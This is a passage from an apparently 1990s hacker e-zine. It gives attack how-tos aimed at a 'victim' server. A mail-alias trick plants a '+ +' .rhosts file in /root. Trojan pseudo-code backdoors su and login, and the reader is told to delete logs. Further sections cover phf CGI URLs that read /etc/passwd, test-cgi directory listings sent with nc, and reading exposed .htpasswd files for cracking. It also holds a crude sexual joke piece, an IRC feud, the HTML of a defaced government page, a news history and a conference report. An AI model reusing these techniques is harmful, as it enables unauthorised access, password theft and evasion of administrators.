  2444. be a .rhosts file with the full pathname embedded.
  2445.  
  2446. here is the script:
  2447.  
  2448. uudecode.sh
  2449. -----------
  2450.  
  2451. #!/bin/sh
  2452. # Create our .rhosts file.  Note this will output to stdout.
  2453.  
  2454. echo "+ +" > tmpfile
  2455. /usr/bin/uuencode tmpfile /root/.rhosts
  2456.  
  2457.  
  2458. Ok, now telnet to victumserver.com at port 25.  Fakemail to decode and use as
  2459. the subject body, the uuencoded version of the .rhosts file. Here is an easy
  2460. one (but not fake):
  2461.  
  2462. echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@victimserver.com
  2463.  
  2464. You can add any program that I have listed to be ran from the alias, so be as
  2465. creative as u want! :)
  2466.  
  2467. =============================================================================
  2468.   section 6:
  2469. =============================================================================
  2470.  
  2471. Others :
  2472.  
  2473. Here is one of the best trojans I have seen. It is sneeky and only detectable
  2474. by programs like tripwire. All you have to do is put the trojan code into a
  2475. the source of some popular system programs. su, login, and passwd are very
  2476. good to add it to because they run a SUID root and don't have strict
  2477. permission so you can modify it. This will tell you what to do after u get
  2478. the source code for the particular UNIX system you are backdooring. If you
  2479. can't get the source for any programs on your system, u may be screwed :(.
  2480. You can find trojaned versions of many programs, here is a small example
  2481. of pseudo-code that is added in such programs...
  2482.  
  2483. get input;
  2484. if input is special hardcoded flag, spawn evil trojan;
  2485. else if input is valid, continue;
  2486. else quit with error;
  2487. ...
  2488.  
  2489. =============================================================================
  2490.   section 7:
  2491. =============================================================================
  2492.  
  2493. Keeping the backdoor :
  2494.  
  2495. Well, the best advice I can possibly give to start off is to cover your
  2496. tracks.  If the admin doesn't know he's been hacked, he won't look for
  2497. backdoors to remove. This will totaly depend on the admins ability to find
  2498. backdoors and know how to get rid of them.
  2499.  
  2500. ───────────────────────────────────────────────────────────────────────────────
  2501.   6. One Last Thing About The Infamous pHf Technique : so1o
  2502. ───────────────────────────────────────────────────────────────────────────────
  2503.  
  2504. You can use this basic form of attack...[Thru NutScrape For Example]
  2505.  
  2506. http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  2507.       [     1      ][     2    ][     3    ][  4  ][5][    6    ]
  2508.  
  2509.   1: The Target Site.
  2510.   2: The pHf Command.
  2511.   3: The Magic pHf Arguments.
  2512.   4: The Program You Wish To Run.
  2513.   5: %20 Is A Space, so %20%20%20 == 3 Spaces.
  2514.   6: The Arguments You Wish To Use.
  2515.  
  2516. Here Are Some Other Examples...
  2517. -------------------------------
  2518.  
  2519. http://www.site.com/cgi-bin/phf?Qalias=x&0a/bin/ls%20-la%20/etc/
  2520.  
  2521. ...This will list the files in the /etc/ directory.
  2522.  
  2523. http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/uname%20-a
  2524.  
  2525. ...This will display the operating system.
  2526.  
  2527. Remember : You execute the commands with pHf as the user nobody, so you can't
  2528.            shutdown the system, echo "+ +" >> /.rhosts etc. etc. All the
  2529.            stuff you throw at the system using phf will be logged too, so
  2530.            if you do decide to hack the system, remember to kill the logs
  2531.            when you get root :)
  2532.  
  2533. ───────────────────────────────────────────────────────────────────────────────
  2534.   7. Test-cgi holes : so1o
  2535. ───────────────────────────────────────────────────────────────────────────────
  2536.  
  2537. Example exploit:
  2538. ----------------
  2539.  
  2540. Below are examples, nc is netcat from avian.org. You can 
  2541. always just telnet to port 80 and type in the GET... command.
  2542.  
  2543.   machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80
  2544.  
  2545.   CGI/1.0 test script report:
  2546.  
  2547.   argc is 1. argv is /\*.
  2548.  
  2549.   SERVER_SOFTWARE = NCSA/1.4.1
  2550.   SERVER_NAME = removed.name.com
  2551.   GATEWAY_INTERFACE = CGI/1.1
  2552.   SERVER_PROTOCOL = HTTP/0.9
  2553.   SERVER_PORT = 80
  2554.   REQUEST_METHOD = GET
  2555.   HTTP_ACCEPT = 
  2556.   PATH_INFO =
  2557.   PATH_TRANSLATED =
  2558.   SCRIPT_NAME = /bin/cgi-bin/test-cgi
  2559.   QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt 
  2560.   /root /sbin /stand /sys /tmp /usr /usr2 /var
  2561.   REMOTE_HOST = remote.machine.com
  2562.   REMOTE_ADDR = 255.255.255.255
  2563.   REMOTE_USER =
  2564.   AUTH_TYPE =
  2565.   CONTENT_TYPE =
  2566.   CONTENT_LENGTH =
  2567.  
  2568. ...Or to see what other cgi-goodies are still floating around...
  2569.  
  2570.   machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80
  2571.  
  2572.   CGI/1.0 test script report:
  2573.  
  2574.   argc is 1. argv is \*.
  2575.  
  2576.   SERVER_SOFTWARE = NCSA/1.4.1
  2577.   SERVER_NAME = removed.name.com
  2578.   GATEWAY_INTERFACE = CGI/1.1
  2579.   SERVER_PROTOCOL = HTTP/0.9
  2580.   SERVER_PORT = 80
  2581.   REQUEST_METHOD = GET
  2582.   HTTP_ACCEPT = 
  2583.   PATH_INFO =
  2584.   PATH_TRANSLATED =
  2585.   SCRIPT_NAME = /bin/cgi-bin/test-cgi
  2586.   QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger 
  2587.   cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html 
  2588.   mail-query mail-query-2 majordomo majordomo.cf marker.cgi 
  2589.   menu message.cgi munger.cgi munger.note ncsa-default.tar post-query 
  2590.   query smartlist.cf src subscribe.cf test-cgi uptime
  2591.   REMOTE_HOST = remote.machine.com
  2592.   REMOTE_ADDR = 255.255.255.255 
  2593.   REMOTE_USER =
  2594.   AUTH_TYPE =
  2595.   CONTENT_TYPE =
  2596.   CONTENT_LENGTH =
  2597.  
  2598. ───────────────────────────────────────────────────────────────────────────────
  2599.   8. Tree raping : digitalboy [DD]
  2600. ───────────────────────────────────────────────────────────────────────────────
  2601.  
  2602. Tree raping can be an exciting and fulfilling hobby, as long as the 
  2603. proper safety precautions are taken. This file will try to outline the 
  2604. process of tree raping, as well as give you some background on the sport of 
  2605. tree raping.
  2606.  
  2607. \|/ History \|/
  2608.  
  2609. Tree raping originated in Eastern Africa long before history was recorded.
  2610. It was practiced by tribes of natives who used it as a test to determine the 
  2611. tribal chief. He who could rape the most trees was surely the most powerful, 
  2612. and therefore the rightful leader.
  2613.  
  2614. The sexual molestation of trees was kept a tribal secret, and no outsiders
  2615. learned of the practice until the late 1800's when Spanish explorer Hernando 
  2616. Ferdinando Enriquez happened to witness the event. He was killed by the 
  2617. natives he had been watching, but before his death he wrote of it in his 
  2618. journal. In 1937, a nun found the journal and the methods of tree raping were 
  2619. spread to the rest of the civilized world.
  2620.  
  2621. \|/ Preparation \|/
  2622.  
  2623. Tree raping is not something you can just go out and do. You must be
  2624. prepared. First and foremost, find a forest. While some of the best trees are 
  2625. found in urban settings, violating them will usually land you in the city 
  2626. jail. Not to mention the public ridicule. No, this is an activity that must 
  2627. take place in a relatively secluded part of a forest. Bring a few friends if 
  2628. that is your fancy, but large tree raping orgies usually lessen the 
  2629. enjoyment. You must also bring a large vat of maple syrup and possible 
  2630. climbing equipment, this will be explained later.
  2631.  
  2632. \|/ Tree Selection \|/
  2633.  
  2634. Picking the right tree to violate is essential. If you pick the wrong
  2635. tree, you could end up feeling inadequate, as well as inflicting serious 
  2636. physical injury upon yourself. Everyone has their own preference as to what 
  2637. type of tree to choose, but there are some general guidelines. The most vital
  2638. factor you have to consider is the position of knotholes. If a knothole is 
  2639. not present, you may be forced to create your own. Any seasoned tree rapist 
  2640. always carries his trusty power drill. Also, be sure to measure the depth of 
  2641. the knothole. The texture of the bark is also important. Extremely rough bark 
  2642. can ruin your experience. Try to find a tree with smooth bark, such as a 
  2643. birch. Note that you are not limited to the part of the tree at ground level. 
  2644. Bring some climbing equipment and you can easily reach the desired level.
  2645.  
  2646. \|/ The Act Of Tree Raping \|/
  2647.  
  2648. Tree raping always has and always must be done in complete nudity. Now,
  2649. remember that you were required to bring along a vat of maple syrup. This 
  2650. object will now come into play. First, heat it to exactly 54.7 degrees 
  2651. Celsius. Next lift the syrup over your head and pour it over your body. Count 
  2652. to 112, then lie down and roll around on the forest floor. You are now ready 
  2653. to begin the ritual. Approach the tree you have picked while screaming "TSAK 
  2654. NARP FNORZA QKWT" as loud as possible. Penetrate the tree and proceed to 
  2655. violate it. Try to keep moving, the maple syrup can be a powerful bonding 
  2656. agent. When you are finished you will have to find your own method of 
  2657. removing the maple syrup. 
  2658.  
  2659. \|/ The End \|/
  2660.  
  2661. Avoid Pine trees AT ALL COSTS!
  2662.  
  2663. ───────────────────────────────────────────────────────────────────────────────
  2664.   9. .htpasswd + .htaccess : Cain [DD]
  2665. ───────────────────────────────────────────────────────────────────────────────
  2666.  
  2667. Well, I'm back. I should have put this article out last month, but I
  2668. neglected to. Flames to /dev/null. Well anyway, you know how sometimes when
  2669. you connect to a web page, you are asked for a username and password? Well,
  2670. here's how that works. In a directory there is a file almost always called
  2671. .htpasswd. And in another directory(or possibly that same one) there is a
  2672. file called .htaccess. The .htpasswd file follows basically the same format as
  2673. the /etc/passwd file:
  2674.  
  2675.    jblow:F#.DG*m38d%RF
  2676.    cain:GJA54j.3g9#$@f
  2677.  
  2678. and the .htaccess file follows this format:
  2679.  
  2680.   AuthUserFile /path/to/.htpasswd
  2681.   <LIMIT GET PUT POST>
  2682.   require user <user>
  2683.   </LIMIT>
  2684.  
  2685. If there is an .htaccess file in a directory, you must have a valid username
  2686. and password to view any files in that directory.
  2687.  
  2688. So here is what happens, the httpd sees the .htaccess file in the directory
  2689. that you request a file from. It finds the location of the .htpasswd file and
  2690. then find out who has access to the files in the directory. Therefore you
  2691. must have a username and password. Well here's the bug:
  2692.  
  2693. Only the files in the directory with the .htaccess file are passworded. So
  2694. if the .htpasswd file is somewhere else (root directory maybe) then you can
  2695. read that file. It uses the same form as /etc/passwd so therefore password
  2696. crackers will work on this also. Insta hack if the webmaster doesn't know
  2697. what he's doing.
  2698.  
  2699. ───────────────────────────────────────────────────────────────────────────────
  2700. ===============================================================================
  2701. ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
  2702. ===============================================================================
  2703. ───────────────────────────────────────────────────────────────────────────────
  2704.  1. Some History : nobody
  2705. ───────────────────────────────────────────────────────────────────────────────
  2706.  
  2707.   Electronic doom will soon be visited on U.S. computer networks by
  2708.   information warriors, hackers, pannational groups of computer-wielding
  2709.   religious extremists, possible agents of Libya and Iran, international
  2710.   thugs and money-mad Internet savvy thieves.
  2711.  
  2712.   John Deutch, director of Central Intelligence, testified to the
  2713.   truth of the matter, so it must be graven in stone. In a long statement
  2714.   composed in the august tone of the Cold Warrior, Deutch said to the
  2715.   Senate Permanent Subcommittee on Investigations on June 25, "My greatest
  2716.   concern is that hackers, terrorist organizations, or other nations might
  2717.   use information warfare techniques" to disrupt the national
  2718.   infrastructure.
  2719.  
  2720.   The lack of solid evidence for any of the claims made by the intelligence
  2721.   community has created an unusual stage on which two British hackers,
  2722.   Datastream Cowboy and Kuji, were made the dog and pony in a ridiculous
  2723.   show to demonstrate the threat of information warfare to members of
  2724.   Congress.  Because of a break-in at an Air Force facility in Rome, NY,
  2725.   in 1994, booth hackers were made the stars of two Government Accounting
  2726.   Office reports on network intrusions in the Department of Defense earlier
  2727.   this year.  The comings and goings of Datastream Cowboy also constitute the
  2728.   meat of Gelber and Christy's minority staff report from the Subcommittee on
  2729.   Investigations.
  2730.  
  2731.   Before delving into it in detail, it's interesting to read what a
  2732.   British newspaper published about Datastream Cowboy, a sixteen year-old,
  2733.   about a year before he was made the poster boy for information
  2734.   warfare and international hacking conspiracies in front of Congress.
  2735.  
  2736.   In a brief article, blessedly so in contrast to the reams of propaganda
  2737.   published on the incident for Congress, the July 5 1995 edition of The
  2738.   Independent wrote, "[Datastream Cowboy] appeared before Bow Street
  2739.   magistrates yesterday charged with unlawfully gaining access to a series
  2740.   of American defense computers. Richard Pryce, who was 16 at the time of
  2741.   the alleged offences, is accused of accessing key US Air Force systems
  2742.   and a network owned by Lockheed, the missile and aircraft manufacturers."
  2743.  
  2744.   Pryce, a resident of a northwest suburb of London did not enter a plea
  2745.   on any of 12 charges levied against him under the British
  2746.   Computer Misuse Act.  He was arrested on May 12, 1994, by New Scotland
  2747.   Yard as a result of work by the U.S. Air Force Office of Special
  2748.   Investigations.  The Times of London reported when police came for
  2749.   Pryce, they found him at his PC on the third floor of his family's house.
  2750.   Knowing he was about to be arrested, he "curled up on the floor and cried."
  2751.  
  2752.   In Gelber and Christy's staff report, the tracking of Pryce, and to a
  2753.   lesser extent a collaborator called Kuji -- real name Mathew Bevan, is
  2754.   retold as an eight page appendix entitled "The Case Study: Rome
  2755.   Laboratory, Griffiss Air Force Base, NY Intrusion."
  2756.  
  2757.   Pryce's entry into Air Force computers was noticed on March 28, 1994,
  2758.   when personnel discovered a sniffer program he had installed on one
  2759.   of the Air Force systems in Rome.  The Defense Information System
  2760.   Agency (DISA) was notified.  DISA subsequently called the Air
  2761.   Force Office of Special Investigations (AFOSI) at the Air Force
  2762.   Information Warfare Center in San Antonio, Texas. AFOSI then
  2763.   sent a team to Rome to appraise the break-in, secure the system and
  2764.   trace those responsible.  During the process, the AFOSI team discovered
  2765.   Datastream Cowboy had entered the Rome Air Force computers for the
  2766.   first time on March 25, according to the report.  Passwords had been
  2767.   compromised, electronic mail read and deleted and unclassified
  2768.   "battlefield simulation" data copied off the facility. The
  2769.   Rome network was also used as a staging area for penetration of other
  2770.   systems on the Internet.
  2771.  
  2772.   AFOSI investigators initially traced the break-in back one step to
  2773.   the New York City provider, Mindvox. According to the Congressional
  2774.   report, this put the NYC provider under suspicion because "newspaper
  2775.   articles" said Mindvox's computer security was furnished by two "former
  2776.   Legion of Doom members." "The Legion of Doom is a loose-knit computer
  2777.   hacker group which had several members convicted for intrusions into
  2778.   corporate telephone switches in 1990 and 1991," wrote Gelber and Christy.
  2779.  
  2780.   AFOSI then got permission to begin monitoring -- the equivalent of
  2781.   wiretapping -- all communications on the Air Force network.  Limited
  2782.   observation of other Internet providers being used during the break-in
  2783.   was conducted from the Rome facilities.  Monitoring told the investigators
  2784.   the handles of hackers involved in the Rome break-in were Datastream
  2785.   Cowboy and Kuji.
  2786.  
  2787.   Since the monitoring was of limited value in determining the whereabouts
  2788.   of Datastream Cowboy and Kuji, AFOSI resorted to "their human intelligence
  2789.   network of informants, i.e., stool pigeons, that 'surf the Internet.'
  2790.   Gossip from one AFOSI 'Net stoolie uncovered that Datastream Cowboy was from
  2791.   Britain. The anonymous source said he had e-mail correspondence with
  2792.   Datastream Cowboy in which the hacker said he was a 16-year old living in
  2793.   England who enjoyed penetrating ".MIL" systems. Datastream Cowboy also
  2794.   apparently ran a bulletin board system and gave the telephone number to the
  2795.   AFOSI source.
  2796.  
  2797.   The Air Force team contacted New Scotland Yard and the British law
  2798.   enforcement agency identified the residence, the home of Richard
  2799.   Pryce, which corresponded to Datastream Cowboy's system phone number.
  2800.   English authorities began observing Pryce's phone calls and noticed
  2801.   he was making fraudulent use of British Telecom.  In addition,
  2802.   whenever intrusions at the Air Force network in Rome occurred, Pryce's
  2803.   number was seen to be making illegal calls out of Britain.
  2804.  
  2805.   Pryce travelled everywhere on the Internet, going through South America,
  2806.   multiple countries in Europe and Mexico, occasionally entering the Rome
  2807.   network.  From Air Force computers, he would enter systems at Jet
  2808.   Propulsion Laboratory in Pasadena, California, and the Goddard Space
  2809.   Flight Center in Greenbelt, Maryland. Since Pryce was capturing the logins
  2810.   and passwords of the Air Force networks in Rome, he was then able to
  2811.   get into the home systems of Rome network users, defense contractors
  2812.   like Lockheed.
  2813.    
  2814.   By mid-April of 1994 the Air Force was monitoring other systems being
  2815.   used by the British hackers. On the 14th of the month, Kuji logged on
  2816.   to the Goddard Space Center from a system in Latvia and copied data
  2817.   from it to the Baltic country.  According to Gelber's report, the
  2818.   AFOSI investigators assumed the worst, that it was a sign that someone
  2819.   in an eastern European country was making a grab for sensitive
  2820.   information.  They broke the connection but not before Kuji had
  2821.   copied files off the Goddard system.  As it turned out, the Latvian
  2822.   computer was just another system the British hackers were using as
  2823.   a stepping stone; Pryce had also used it to cover his tracks when
  2824.   penetrating networks at Wright-Patterson Air Force Base in Ohio, via
  2825.   an intermediate system in Seattle, cyberspace.com.
  2826.  
  2827.   The next day, Kuji was again observed trying to probe various
  2828.   systems at NATO in Brussels and The Hague as well as Wright-Patterson.
  2829.   On the 19th, Pryce successfully returned to NATO systems in The
  2830.   Hague through Mindvox.  The point Gelber and Christy seem to be trying
  2831.   to make is that Kuji, a 21-year old, was coaching Pryce during some
  2832.   of his attacks on various systems.
  2833.  
  2834.   By this point, New Scotland Yard had a search warrant for Pryce
  2835.   with the plan being to swoop down on him the next time he accessed
  2836.   the Air Force network in Rome.
  2837.  
  2838.   In April, Pryce penetrated a system on the Korean peninsula and copied
  2839.   material off a facility called the Korean Atomic Research Institute
  2840.   to an Air Force computer in Rome. At the time, the investigators had
  2841.   no idea whether the system was in North or South Korea.  The impression
  2842.   created is one of hysteria and confusion at Rome. There was fear that the
  2843.   system, if in North Korea, would trigger an international incident, with
  2844.   the hack interpreted as an "aggressive act of war." The system turned
  2845.   out to be in South Korea.
  2846.  
  2847.   During the Korean break-in, New Scotland Yard could have intervened and
  2848.   arrested Pryce.  However, for unknown reasons, the agency did not.  Those
  2849.   with good memories may recall mainstream news reports concerning Pryce's
  2850.   hack, which was cast as an entry into sensitive North Korean networks.
  2851.  
  2852.   It's worth noting that while the story was portrayed as the work of
  2853.   an anonymous hacker, both the U.S. government and New Scotland Yard knew
  2854.   who the perpetrator was.  Further, according to Gelber's report English
  2855.   authorities already had a search warrant for Pryce's house.
  2856.  
  2857.   Finally, on May 12 British authorities pounced.  Pryce was arrested
  2858.   and his residence searched.  He crumbled, according to the Times of
  2859.   London, and began to cry.  Gelber and Christy write that Pryce promptly
  2860.   admitted to the Air Force break-ins as well as others.  Pryce
  2861.   confessed he had copied a large program that used artificial intelligence
  2862.   to construct theoretical Air Orders of Battle from an Air Force computer
  2863.   to Mindvox and left it there because of its great size, 3-4 megabytes.
  2864.   Pryce paid for his Internet service with a fraudulent credit card number.
  2865.   At the time, the investigators were unable to find out the name and
  2866.   whereabouts of Kuji. A lead to an Australian underground bulletin board
  2867.   system failed to pan out.
  2868.  
  2869.   On June 23 of this year, Reuters reported that Kuji -- 21-year-old Mathew
  2870.   Bevan -- a computer technician, had been arrested and charged in
  2871.   connection with the 1994 Air Force break-ins in Rome.
  2872.  
  2873.   Rocker Tom Petty sang that even the losers get lucky some time.  He
  2874.   wasn't thinking of British computer hackers but no better words could be
  2875.   used to describe the two Englishmen and a two year old chain of events that
  2876.   led to fame as international computer terrorists in front of Congress
  2877.   at the beginning of the summer of 1996.
  2878.  
  2879.   Lacking much evidence for the case of conspiratorial computer-waged
  2880.   campaigns of terror and chaos against the U.S., the makers of Congressional
  2881.   reports resorted to telling the same story over and over, three
  2882.   times in the space of the hearings on the subject. One envisions U.S.
  2883.   Congressmen too stupid or apathetic to complain, "Hey, didn't we get that
  2884.   yesterday, and the day before?" Pryce and Bevan appeared in "Security in
  2885.   Cyberspace" and twice in Government Accounting Office reports AIMD-96-84
  2886.   and T-AIMD96-92. Jim Christy, the co-author of "Security in Cyberspace"
  2887.   and the Air Force Office of Special Investigations' source for the Pryce
  2888.   case supplied the same tale for Jack Brock, author of the GAO reports.
  2889.   Brock writes, ". . . Air Force officials told us that at least one of
  2890.   the hackers may have been working for a foreign country interested in
  2891.   obtaining military research data or areas in which the Air Force was
  2892.   conducting advanced research."  It was, apparently, more wishful
  2893.   thinking.
  2894.  
  2895.   This years UK hacking conference : Access All Areas.
  2896.                                      http://www.access.org.uk
  2897.                                      July 5th.
  2898.  
  2899. ───────────────────────────────────────────────────────────────────────────────
  2900.   2. [GUNNAR], MadSeason and sIn : so1o
  2901. ───────────────────────────────────────────────────────────────────────────────
  2902.  
  2903. Some dudes called MadSeason and [GUNNAR] has been proving sIn's true lameness
  2904. and logging it all at the same time, phear elite logging skills...
  2905.  
  2906. ##################################################################################
  2907. #                                         #
  2908. #                      Darkfool                     #
  2909. #                (What a Fool/The PHF hacker)             #
  2910. #                     BY [GUNNAR]                 #
  2911. #                                         #
  2912. ##################################################################################
  2913.  
  2914. Ever read a hacking txt by this guy? Ever realize just how useless the
  2915. information his txt's are? Nothing in his txt files aren't covered in a hundred
  2916. text files written before which better explain hacking techniques. Like a quote
  2917. from my pal MadSeason goes:
  2918.  
  2919. "The fact is these txt files about hacking and phreaking are written by people 
  2920. with minimal knowledge. Then you have some newbie who comes along wanting to be 
  2921. some hacker god and reads a few files and has even less of a clue then the
  2922. writer had about the subject, then goes around spewing out bullshit and claiming
  2923. they are a hacker and/or phreaker, just an endless circle of ignorance."
  2924.  
  2925. That quote is so true. All these hack txt's realeased by these groups like
  2926. S.I.N. and Techonophoria are just crap. About the only exploit that Darkfool
  2927. knows the the PHF bug found in older versions of NCSA and Apache httpd. This
  2928. bug is very well know(And over exploited might I add.). Do a search for ac.jp or
  2929. edu.au domains, and adding to the address "cgi-bin/phf?Qalias=x%0a/bin/cat%20
  2930. /etc/passwd" is neither impressive nor is it even hacking. It's a lame excuse for
  2931. hacking.
  2932.  
  2933. Darkfool claims many things that he doesn't know. For instance, take pascal
  2934. programming. He claims to know it, but when asked a single question on it
  2935. by, Scorpion(MadSeason), he cannot answer. Here is a little something:
  2936.  
  2937. [13:53] <Scorpion> How many parameters do Cluster object constructors take in
  2938. pascal, DF?
  2939. [13:53] <Darkfool> i have no idea scorpion
  2940. [13:54] <Scorpion> I thought you knew Pascal
  2941. [13:54] <Darkfool> i am learning it at college
  2942.  
  2943. There is a big difference between knowing and learning. I guess Darkfool doesn't
  2944. realize that. It's all a part of trying to sound and seem "elite". Which
  2945. Darkfool is far from being. Seems as thought Darkfool and the rest of his S.I.N.
  2946. pals are compying MadSeason and myself, and questioning peoples abilities. It's
  2947. funny though, when MadSeason and I got to #sin questioning them, we get kicked
  2948. for making them look stupid. And when they as us something, and it doesn't go
  2949. quite as
  2950. they planned it. Look what they do...
  2951.  
  2952. [14:14] *** Now talking in #sin
  2953. [14:15] <Darkfool> hey
  2954. [14:15] <Darkfool> how do i kill all jobs running on a shell ?
  2955. <[GUNNAR]> Well hello there!
  2956. [14:15] <HoMeR> hey
  2957. <[GUNNAR]> kill -9 PID
  2958. <[GUNNAR]> If you really wanna kill it.
  2959. <[GUNNAR]> Boo Hoo.
  2960. <[GUNNAR]> Damn, that one didn't go well for you did it?
  2961. <[GUNNAR]> BTW, use the ps command to get the PID.
  2962. <[GUNNAR]> la la la la...
  2963. [14:17] *** Sinning sets mode: +b *!*@*.wco.com
  2964. [14:17] *** You were kicked by Fa|lur3 (banned)
  2965.  
  2966. In short, Darkfool, S.I.N. and the rest like him are really just wannabes
  2967. trying to sound big and bad. Nothing wrong with groups or people who actually
  2968. hack. But, when you have a group like S.I.N. who's members claim more than
  2969. they know, it is truely sad. I myself and no great hacker(I'm not a hack.
  2970. Plain and simple.) nor am I some s00per programmer. But the thing is, I do not
  2971. claim more than I actually know. This is obviously not how Darkfool thinks of
  2972. things. He wants to be known as a s00per hacker, which he is not. 
  2973.  
  2974. I'm writing this so you(The Readers) don't buy into this bullshit and be misled
  2975. by people like Darkfool and the group he is in S.I.N.! They are truely sad
  2976. people. What a shame I have brought out the truth!
  2977.  
  2978. I think more is somewhere on http://www.ilf.net/teknopia/
  2979.  
  2980. ───────────────────────────────────────────────────────────────────────────────
  2981.   3. "Welcome to the [D]epartment of [O]wned [E]nergy" : so1o
  2982. ───────────────────────────────────────────────────────────────────────────────
  2983.  
  2984. The http://www.doe.ca (Canadian Dept. of Energy) was changed last weekend...
  2985.  
  2986. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
  2987. <HTML>
  2988. <HEAD>
  2989.    <TITLE></TITLE>
  2990.    <META NAME="Author" CONTENT="Tetsu Khan">
  2991.    <META NAME="GENERATOR" CONTENT="Mozilla/3.01Gold (Win95; I) [Netscape]">
  2992. </HEAD>
  2993. <BODY TEXT="#FFFFFF" BGCOLOR="#000000" LINK="#FFFFFF" VLINK="#C0C0C0" ALINK="#FF0000">
  2994.  
  2995. <CENTER><P><B><TT><FONT COLOR="#FF0000"><FONT SIZE=+2>Welcome To The [D]epartment
  2996. of [O]wned [E]nergy</FONT></FONT></TT></B></P></CENTER>
  2997.  
  2998. <CENTER><P>
  2999. <HR WIDTH="100%"></P></CENTER>
  3000.  
  3001. <CENTER><P>You could define this as an act of aggression, or you could
  3002. define it as us, the hackers (or crackers), just adivising you to try and
  3003. make it more difficult for us, at least employ consultants etc. who have
  3004. a CLUE. because one day, in the not so distant future, the internet equivalent
  3005. of Pearl Harbour will occur, and we will only be around to say "We
  3006. told you so", until that day, we will keep reminding you, get some
  3007. security, its better for you, its better for us, its better for everyone.</P></CENTER>
  3008.  
  3009. <CENTER><P>In this case, even though your system runs HP-UX, we advise
  3010. you still take the time to look into all the exploits that are available
  3011. for this operating system, and then get over to www.cert.org to find some
  3012. advisories.</P></CENTER>
  3013.  
  3014. <CENTER><P>This attack was brought to you in association with 0range Amusements.</P></CENTER>
  3015.  
  3016. <CENTER><P><IMG SRC="pac001.gif" HEIGHT=190 WIDTH=175></P></CENTER>
  3017.  
  3018. <CENTER><P>Greets to so1o, helix, xFli, modeX, c0d, xrx, zer0x, organik,
  3019. phractal chaos and all the usual suspects.</P></CENTER>
  3020.  
  3021. <CENTER><P>
  3022. <HR WIDTH="100%"></P></CENTER>
  3023.  
  3024. <CENTER><P><TT><FONT COLOR="#FF0000">In the meantime, maybe you would like
  3025. to visit...</FONT></TT></P></CENTER>
  3026.  
  3027. <CENTER><P><FONT SIZE=+2><A HREF="http://www.crackhouse.com">The CrackHouse</A></FONT></P></CENTER>
  3028.  
  3029. <CENTER><P><FONT SIZE=+2><A HREF="http://micros0ft.paranoia.com">Micro$oft</A></FONT></P></CENTER>
  3030.  
  3031. <CENTER><P><FONT SIZE=+2><A HREF="http://www.codez.com">The CodeZero</A></FONT></P></CENTER>
  3032.  
  3033. <CENTER><P>
  3034. <HR WIDTH="100%"></P></CENTER>
  3035.  
  3036. <CENTER><P><B><TT><BLINK><FONT COLOR="#8000FF">We 0wN j00r EnErGy!@# wE
  3037. 0wN j00R LiGhTbUlBz!@#~</FONT></BLINK></TT></B></P></CENTER>
  3038.  
  3039. </BODY>
  3040. </HTML>
  3041.  
  3042. ───────────────────────────────────────────────────────────────────────────────
  3043.  4. LOPHT.COM : so1o
  3044. ───────────────────────────────────────────────────────────────────────────────
  3045.  
  3046. Get into any shell, and type...
  3047.  
  3048. % whois lopht.com
  3049.  
  3050. ...It's elite (lookup sIn inf0z to see)
  3051.  
  3052. ───────────────────────────────────────────────────────────────────────────────
  3053.  5. AAA Report : so1o
  3054. ───────────────────────────────────────────────────────────────────────────────
  3055.  
  3056. AAA stands for Access All Areas, it is a computer security and hacking
  3057. conference held in the UK in early July of every year, this would be the
  3058. third year of AAA, and myself and NightRage were going.
  3059.  
  3060. Myself and NightRage arrived on Regent Street at 9:30am, we entered the
  3061. University of Westminster building, purchased two passes for the event, and
  3062. proceeded to the conference room, where there were many people aged between
  3063. 16 and around 40, all with a handful of common interests, hacking, phreaking,
  3064. carding and generally the ability to gain power, or "free stuff".
  3065.  
  3066. We sat down on the ground floor near the back of the room, we got talking to
  3067. a french hacker, called Leon (aka acme), we joked about "o-DaY WaReZ" and then
  3068. Nightrage booted his p150 laptop, then Leon pulled out his Thinkpad, he booted
  3069. it, and it counted up to 64mb of RAM, we asked how much hard drive space he had
  3070. to which he casually replied "6 gig", Leon knew stuff.
  3071.  
  3072. The first speaker was Ross Anderson, who explained how our predecessors had
  3073. broken into cash machines (atm's) using various techniques, as well as the
  3074. flaws in such machines and systems, ranging from all cards having the same
  3075. PIN, to a trick that Shefield hackers used with phone cards to get cash.
  3076. He then went on to smartcards and encryption and finished around 11am.
  3077.  
  3078. We then went up to the network room, where the "hack the flag" competition
  3079. was to be held, there were a handful of people up there, including a
  3080. photgrapher and some staff, I only saw 3 systems and 2 terminals, not really
  3081. enough to use for any competition.
  3082.  
  3083. Leon sat down and started to toy with his laptop and some CD's he had purchased
  3084. in Pakistan the day before, he had voice recognition programs and games and a
  3085. few other "expensive" CD's.
  3086.  
  3087. We met an American wearing an FBI cap, he also had a laptop, as well as another
  3088. with long blonde / grayish hear who did alot of cool stuff with the phone line
  3089. in the network room using various toys he had.
  3090.  
  3091. We needed to set up a network, we had numerous modems, one network hub with 5
  3092. ports, around 8 systems and one phone socket.
  3093.  
  3094. We soon realised through various methods (one using NightRage's cheap blue
  3095. telephone) that the only phone socket in the room went through the reception,
  3096. so NightRage phoned down to the reception, and tried to use his amazing social
  3097. engineering skills..
  3098.  
  3099. Reception : "hello?"
  3100. NightRage : "hi, is there any way I can get an outside line from this phone?"
  3101. Reception : "no"
  3102. NightRage : "OK"
  3103.  
  3104. We then went on a hunt for working phone lines or hubs that we could use to
  3105. help us set up our network, the FBI dude soon found a cabinet that looked
  3106. important, and NightRage and the others helped him pick the lock, inside
  3107. they found a 3com network hub and a few other goodies, the FBI dude got his
  3108. laptop and tried to hack his way onto the network, but he couldn't use
  3109. traceroute or any other programs, so that hub was useless to us unless we
  3110. knew our own IP.
  3111.  
  3112. Two younger hackers started to manually wardial the extensions, they found a
  3113. handful of modem numbers in a very short amount of time. We were quite
  3114. impressed by their skills.
  3115.  
  3116. The guy with the long blond / grayish hair went down to a computer shop on
  3117. Regent street to buy some RJ45 cable so we could use the hub in the
  3118. cabinet, but he left before we realised that it wasn't usable.
  3119.  
